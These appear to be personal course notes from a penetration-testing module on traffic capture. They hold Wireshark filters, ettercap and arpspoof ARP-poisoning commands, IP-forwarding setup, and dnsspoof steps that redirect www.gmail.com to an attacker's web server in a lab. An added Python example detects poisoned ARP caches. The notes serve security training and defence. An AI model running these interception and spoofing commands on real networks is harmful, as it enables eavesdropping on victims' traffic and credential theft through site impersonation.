Oishi | Advanced Penetration Testing | Module 6 - Traffic Capture

By: Oishi | Related Course: Advanced Penetration Testing | Published: July 25, 2017 | Modified: August 3, 2017

Capture Traffic (pt 2): Analyzing Network

Kali

Tool: Wireshark

Capture > Interfaces > eth0

Uncheck "Use promiscuous mode" (if on the same network)

Open a terminal window: ping 192.168.1.64 (example)

Filter: ftp && ip.dst==192.168.1.64

Filter: ip.src==192.168.1.64 || ftp && ip.dst==192.168.1.64

domain controller- ubuntu term.>>>

ftp 192.168.1.64

> enter name and pw

> dir

See the files listed in the terminal and in Wireshark

ettercap

Kali

man in the middle

> ettercap -Ti eth0 -M arp:remote /192.168.1.1/ /192.168.1.76/

ARP spoof outcome

> nano /proc/sys/net/ipv4/ip_forward

Wireshark > filter TLSv1 or HTTP

ettercap

> nano /etc/ettercap/etter.conf

(turn off ipv4)

Traffic capture (ARP)

Address Resolution Protocol (ARP)

 

Translates the IP address to the MAC address of the network adapter

Tells the host where to send traffic

If we can trick a host into sending traffic to the wrong place, we can capture that traffic in Wireshark

--------------

Kali = 192.168.20.9

windows xp 192.168.20.10

ubuntu 192.168.20.11

Ubuntu sends traffic destined to windows xp to kali > kali forwards traffic to ubuntu

or 

Kali forwards traffic to windows xp> windows xp sends traffic destined for ubuntu to Kali    

--------------

Kali> arpspoof -i eth0 -t 192.168.1.76 192.168.1.80

>cat /proc/sys/net/ipv4/ip_forward

> echo 1 > /proc/sys/net/ipv4/ip_forward

>arp

>arp -a (for ubuntu and windows)
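Added example (not from the course or the original notes): a check over `arp -a` output from Ubuntu or Windows that flags what a poisoned cache looks like, namely one MAC answering for several IPs, or an IP whose MAC differs from a known-good snapshot. The sample tables are constructed from the lab addresses above; the MAC addresses are made up.

```python
import re
from collections import defaultdict

# IPv4 followed on the same line by a MAC, in Linux or Windows `arp -a` layout.
ENTRY = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})\)?[ \t]+(?:at[ \t]+)?"
                   r"([0-9A-Fa-f]{2}(?:[:-][0-9A-Fa-f]{2}){5})")

def parse_arp_table(text):
    """Return {ip: mac} from `arp -a` output (Linux or Windows layout)."""
    table = {}
    for ip, mac in ENTRY.findall(text):
        mac = mac.lower().replace("-", ":")
        if int(mac[:2], 16) & 1:      # skip broadcast/multicast entries
            continue
        table[ip] = mac
    return table

def shared_macs(table):
    """MACs that answer for more than one IP: {mac: [ips]}."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def changed_bindings(baseline, current):
    """IPs whose MAC differs from a known-good snapshot: {ip: (old, new)}."""
    return {ip: (baseline[ip], mac) for ip, mac in current.items()
            if ip in baseline and baseline[ip] != mac}

# Constructed samples: lab IPs from the notes, invented MAC addresses.
UBUNTU_CLEAN = """\
? (192.168.20.9) at 00:0c:29:aa:aa:09 [ether] on eth0
? (192.168.20.10) at 00:0c:29:bb:bb:10 [ether] on eth0
"""
UBUNTU_POISONED = """\
? (192.168.20.9) at 00:0c:29:aa:aa:09 [ether] on eth0
? (192.168.20.10) at 00:0c:29:aa:aa:09 [ether] on eth0
"""
WINDOWS_POISONED = """\
Interface: 192.168.20.10 --- 0x2
  Internet Address      Physical Address      Type
  192.168.20.9          00-0c-29-aa-aa-09     dynamic
  192.168.20.11         00-0c-29-aa-aa-09     dynamic
  192.168.20.255        ff-ff-ff-ff-ff-ff     static
"""

if __name__ == "__main__":
    current = parse_arp_table(UBUNTU_POISONED)
    print("shared MACs:", shared_macs(current))
    print("changed:", changed_bindings(parse_arp_table(UBUNTU_CLEAN), current))
    print("windows:", shared_macs(parse_arp_table(WINDOWS_POISONED)))
```

A shared MAC can also be legitimate (a router or a host with several addresses), so treat a hit as a prompt to compare against the baseline.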


Traffic Capture DNS

DNS Cache Poisoning

>host.txt: 192.168.20.9 www.gmail.com

Restart arpspoofing between gateway and target

>dnsspoof -i eth0 -f host.txt

> arpspoof -i eth0 -t 192.168.1.1 192.168.1.80 (= says I am the gateway)

> nano hosts.txt

> 127.0.0.1 www.gmail.com

>service apache2 start

> dnsspoof -i eth0 -f /root/hosts.txt